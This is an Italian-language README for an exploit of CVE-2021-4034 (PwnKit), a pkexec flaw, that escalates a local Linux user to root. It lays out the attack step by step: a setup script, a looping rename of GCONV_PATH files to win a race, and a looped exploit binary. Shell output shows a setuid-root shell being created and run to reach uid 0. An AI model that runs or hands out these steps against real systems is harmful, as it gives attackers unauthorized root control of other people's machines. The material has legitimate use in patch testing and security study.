
# Exploit per CVE-2021-4034 (PwnKit) che sfrutta una condizione di gara in pkexec per elevare i privilegi a root sui sistemi Linux.
Exploit per la vulnerabilità pwnkit del team Qualys.
Questo exploit presuppone che gcc sia presente sulla macchina di destinazione.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Esegui il seguente comando in una sessione bash:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Esegui il seguente comando in un'altra sessione bash:
while :; do ./exploit; done
Alla fine vincerai la gara e otterrai un binario shell che ti dà
accesso root:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Una breve descrizione della tecnica è disponibile sul mio blog.